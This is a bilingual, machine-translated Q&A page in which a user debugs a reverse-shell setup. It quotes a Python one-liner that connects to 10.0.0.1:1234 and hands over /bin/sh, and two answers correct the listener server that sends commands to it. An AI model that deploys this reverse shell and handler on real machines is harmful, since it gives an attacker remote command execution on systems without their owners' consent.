bash shell 和 python 服务器发送命令
[英]bash shell and python server to send commands
问题描述
I had a doubt regarding one of my reverse shell I tried locally:
我对我在本地尝试的反向 shell 之一有疑问:
After trying manually the steps to get an interactive shell with the following reverse shell:在手动尝试使用以下反向 shell 获取交互式 shell 的步骤后:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.0.0.1",1234));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
_ _
I tried to do a python server that would automate this:我试图做一个 python 服务器来自动化这个:
# coding: utf-8
import socket
socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
socket.bind(('', 1234))
socket.listen(1)
client, address = socket.accept()
print "{} connected".format( address )
while True:
print(client.recv(2048)) # this showed me I had a shell
client.send(input("").encode('utf-8'))
client.close()
stock.close()
Can someone figure out why my commands are not executed but the shell is launched (client side)?有人能弄清楚为什么我的命令没有执行但 shell 启动(客户端)吗?
Thanks.谢谢。
2 个解决方案
解决方案1
0 2022-01-08 22:46:57
client.send(input("").encode('utf-8'))
input will strip the newline from the input it read. input将从它读取的输入中删除换行符。 The shell though is expecting a command to end with a newline. shell 虽然期望命令以换行符结尾。 The fix is thus to add the missing newline:因此,解决方法是添加缺少的换行符:
client.send(input("").encode('utf-8') + b"\n")
解决方案2
0 2022-01-08 22:49:29
- First, the variable names should not be the same as the library names.首先,变量名不应与库名相同。
- The server first expects some data, but there is no data to come.服务器首先需要一些数据,但没有数据到来。 That's why the problem occurs.这就是问题发生的原因。
- Since you are connecting directly to the shell, you must use a newline specifier, ie '\n' every time data is sent由于您直接连接到 shell,因此每次发送数据时都必须使用换行符,即 '\n'
- Each time data is sent, you have to wait a little while to fetch the data.每次发送数据时,您都必须等待一段时间才能获取数据。 If you don't wait, there will be a problem because you are trying to pull the data before the code is run on the other side.如果你不等待,就会出现问题,因为你试图在代码在另一端运行之前拉取数据。
- You need to decode the incoming data您需要解码传入的数据
- Closing the client and socket will not work.关闭客户端和套接字将不起作用。 Because it will never exit the while loop and the codes below will not work.因为它永远不会退出 while 循环,并且下面的代码将不起作用。 You can do a check for output for that.您可以为此检查 output。 For example, when you type 'exit', the loop will end.例如,当您键入“退出”时,循环将结束。
The code should be at least like this:代码至少应该是这样的:
import socket
import time
def interact(client):
command=''
while(command != 'exit'):
command=input('$ ')
client.send((command + '\n').encode('utf-8'))
time.sleep(0.5)
print client.recv(2048).decode('utf-8')
client.close()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.bind(('', 1234))
s.listen(1)
client, addr = s.accept()
print "{} connected".format( addr )
interact(client)
声明:本站的技术帖子网页,遵循CC BY-SA 4.0协议,如果您需要转载,请注明本站网址或者原文地址。任何问题请咨询:yoyou2525@163.com.